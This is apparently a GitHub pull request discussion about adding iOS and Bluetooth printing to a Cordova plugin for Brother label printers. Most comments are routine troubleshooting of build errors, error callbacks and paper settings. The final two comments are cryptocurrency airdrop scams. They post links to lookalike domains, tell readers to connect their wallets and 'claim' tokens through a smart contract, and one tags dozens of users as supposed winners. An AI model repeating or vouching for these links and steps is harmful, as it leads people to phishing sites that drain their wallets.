### PR TITLE
Initial support for iOS, Bluetooth printing

### PR DESCRIPTION
**Pull request by gordol**
### Todo

* Label size is currently hard-coded and specified on calls to setPrinter
* The supported printer list only contains printers I have tested personally, Brother QL-720NW and Brother QL-820NWB. With changes to allow for the changing of the label type, this would likely support all brother label printers, but it needs to be tested by someone with access.

* iOS has bluetooth issues according to @Ayiga in #10 

* Documentation/readme needs to be updated.

* Need to test! Anyone have a basic iOS Cordova app to test this with? Should we include a boilerplate example with this plugin to help users get started?

### CODE REVIEW

**Comment by gordol** [comment]
@Ayiga are you able to build?

`Building status: error (List<Bitmap> cannot be converted to
ArrayList<Bitmap>)`

**Comment by gordol** [comment]
https://github.com/gordol/cordova-brother-label-printer/pull/11/files#diff-7ffdcc51506a24e861e75e002ed22eddR19

**Comment by dev-fJ-del** [comment]
Hi, for the life of me, I cannot seem to call the findPrinters function, do
you perhaps know how to translate this typescript to javascript?

Sample:

function findPrinters(success: (printers: Printer[]) => void, failure:
(reason: string) => void): void

What I've got:
            cordova.plugins.brotherPrinter.findPrinters(function (a) {
                alert(a);
            }, viewModel.onSuccess, viewModel.onError);

or even this does not want to
work:cordova.plugins.brotherPrinter.findPrinters(viewModel.onSuccess,
viewModel.onError);

Thank you for the assistance!

**Comment by gordol** [comment]
@dev-fJ-del You should just be able to call findPrinters(). It takes two parameters, a success callback, and a failure callback.

Your second example looks correct to me.

`findPrinters(onSuccess, onError);`

That being said, I have not actually tested this PR yet, that's why it's on the dev branch.

**Comment by gordol** [comment]
Can you send any log outputs? You should see some log messages if any printers are found. Are you receiving any errors?

**Comment by dev-fJ-del** [comment]
Ok, I got it to work up until where it calls the printViaSDK, I get the error: "ERROR_WRONG_CUSTOM_INFO"
I checked the sdk docs :

> Error: Wrong information in custom paper setting file

No idea what to do from here on.

**Comment by gordol** [comment]
This is some of the new stuff... Hmm...

@Ayiga was this pulled over from brother by mistake, or did you need this?
https://github.com/gordol/cordova-brother-label-printer/blob/9d882751c985589cf2ddf872b3e4dfc39904f13f/src/android/Common.java#L87-L88

@dev-fJ-del  Try modifying this line: https://github.com/gordol/cordova-brother-label-printer/blob/9d882751c985589cf2ddf872b3e4dfc39904f13f/src/android/BasePrint.java#L343

to

```
                mPrinterInfo.customPaper = customSetting;
```

Basically, remove the CUSTOM_PAPER_FOLDER bit... and let me know if it works?

**Comment by Ayiga** [comment]
@gordol I can build what I had currently without issues.  I'll have to repull this repo to make sure everything still works on this end.

as far as the `CUSTOM_PAPER_FOLDER` setting, it was just code that was copied from Brother.  I did a quick pass to remove or modify stuff that I thought wasn't necessary, and I may have missed some things.  I believe the custom paper settings are for larger printers, but I'm not certain, they are likely not necessary.

**Comment by VictorCoding** [comment]
I've purposely been triggering a network error to occur when calling printViaSDK by having my ipad connected to a different network than that of the brother printer, however the callback never gets runned, instead I see this in my safari and xcode consoles error: Error occured while WLAN printing. Which is line 557 in BrotherPrinter.m file.

https://github.com/gordol/cordova-brother-label-printer/blob/dev/src/ios/BrotherPrinter.m#L557

It would be great if the callback actually got triggered with a good error as a response that way I can handle that on the js side. Otherwise, the js side has no idea why the printer didn't print since the callback never gets invoked.
Any help would be appreciated.

**Comment by gordol** [comment]
@VictorCoding What is outputted by this line? `NSLog(@"Communication Result: %d", result);` Is it empty?

**Comment by VictorCoding** [comment]
@gordol i get a `0`

**Comment by gordol** [comment]
I'm not super familiar with this IOS code, but looks like the meat of that is happening here: https://github.com/gordol/cordova-brother-label-printer/blob/dev/src/ios/BRWLANPrintOperation.m

`communicationResultForWLAN` is a boolean.

What do you have if you dump: `wlanOperation.resultStatus`? `resultStatus` comes from `getPTStatus` via: https://github.com/gordol/cordova-brother-label-printer/blob/dev/src/ios/libs/BRPtouchPrinterKit.framework/Headers/BRPtouchPrinter.h

My objective C isn't very strong, I'll need to brush up on some basics before I can be of more help.

**Comment by gordol** [comment]
Can you put some debug logging here, to see if your printer is ready?

https://github.com/gordol/cordova-brother-label-printer/blob/dev/src/ios/BRWLANPrintOperation.m#L61

**Comment by gordol** [comment]
I don't know the details of the IOS Brother SDK, but it seems to me, that what you want are two things... Callbacks for failure to associate with the printer, and a callback for failure to print.

On Android, we don't allow a call to `printViaSDK` unless a printer is found.

`resultstatus` should have what you need, right?

**Comment by VictorCoding** [comment]
@gordol The printer is NOT ready so it skips to line 77. In my javascript implementation for `setPrinter`'s my success callback is invoked, which then I call `printViaSDK`, but that's when I dont get my callback invoked.

btw, thanks for your assistance even if your objective c game is rusty. at least it's better than me, i dont know objective c at all.

**Comment by Ayiga** [comment]
@gordol @VictorCoding 

I believe this is due to the original code for handling the callback in the javascript file:

[https://github.com/gordol/cordova-brother-label-printer/blob/dev/www/printer.js#L24](https://github.com/gordol/cordova-brother-label-printer/blob/dev/www/printer.js#L24)

And the Original:
[https://github.com/gordol/cordova-brother-label-printer/blob/master/www/printer.js#L15](https://github.com/gordol/cordova-brother-label-printer/blob/master/www/printer.js#L15)

As you can see in that file, all errors just get console logged instead of passed back to the user.  It's one of the things I worked to fix with this pull request:

[https://github.com/ayiga/cordova-brother-label-printer/blob/master/www/printer.js#L50](https://github.com/ayiga/cordova-brother-label-printer/blob/master/www/printer.js#L50)

But, I haven't been able to come back to this project and update it so that it's "good enough".  I will push what I have, but I have added some quick and dirty solutions for what I needed in my particular use case without really addressing the talking points @gordol brought up before.  I just haven't had the time to come back, and give it the attention it needs, unfortunately. :(

**Comment by chetuBhadra93** [comment]
Hello,
Thanks for this great plugin for iOS.
I successfully print label for my Brother QL-810 printer.
But currently I am receiving one issue, that I am receiving printer in onFailure of findNetworkPrinter method.
Please find following code please guide me where I am doing wrong.

**cordova.plugins.brotherPrinter.findNetworkPrinters((success) => {}, (error) => {})**

thanks in advance.

**Comment by VictorCoding** [comment]
@chetuBhadra93 could you provide the actual data you're getting from the `onFailure` callback?

**Comment by arcadius** [comment]
Hello @gordol , @VictorCoding @Ayiga ....

Not sure what version of XCode you guys are using ... After installing this plugin dev branch, my project will not even compile in Xcode .... please see more detail on #34

**Comment by VictorCoding** [comment]
@arcadius im using version 9.4.

**Comment by KBIOS997** [comment]
img_20181113_130324
Hellp @gordol and @VictorCoding   I have use your brother label printer sdk.
SDK working fine. When I call printviaSDK  method. Getting success response. But printer doesn't print any image. response getting success but noting happen.

**Comment by bpieres** [comment]
### LayerZero Airdrop Guide: BIGGEST Airdrop in 2023 ($ZRO Token Confirmed) 🪂

LayerZero is one of the most ANTICIPATED airdrops in 2023, and users can potentially earn up to $10,000 in airdrop rewards! This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Claim Now on Layerzero Oficial](http://link.layerzer0network.online/rFz335)

Claim Now

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).
   - 
2. **Share on Social Media:**
   - **Facebook:**
     [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://medium.com/@LAirdrops1/list/crypto-airdrop-2024-f533ec3f79e5&text=LayerZero+Airdrop+Guide)
   - **Twitter:**
     [Share on Twitter](https://twitter.com/share?url=https://medium.com/@LAirdrops1/list/crypto-airdrop-2024-f533ec3f79e5&text=LayerZero+Airdrop+Guide)
   - **Instagram:**
     [Share on Reddit](https://reddit.com/submit?url=https://medium.com/@LAirdrops1/list/crypto-airdrop-2024-f533ec3f79e5&title=LayerZero+Airdrop+Guide) 

2. **Eligibility Check:**
   - Confirm your eligibility for the Layerzero Airdrop.

**Comment by arconejeros** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[Claim Now](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @DanHeidinga, @wchi-winker, @FinalLody, @magicalunixgirl, @wsxyeah, @niphor, @HelloYmf, @pablotron, @yujuenianbei, @Lyq1st, @wonderzdh, @jstzwj, @Xyc0, @teichopsia, @r4j4h, @sh4hin, @lizhuowu, @praydog, @DrSensor, @Comaxim, @CMD-reverse, @Mini-Ware, @awesomejue, @perrog, @vazhnov, @Neshamon, @awgil, @krodyx, @c00kie-sama, @johnnyliu369, @hanlz, @focusoncdr, @ender2101, @aresbit, @HTuennermann, @jmazzola, @LebJe, @yq-koh, @s79n, @attackgithub, @rpw, @ShaneK2, @KCreate, @HoMeCracKeR, @blm666, @anight, @09H4X, @duangsuse, @aleksvor, @wjybluse
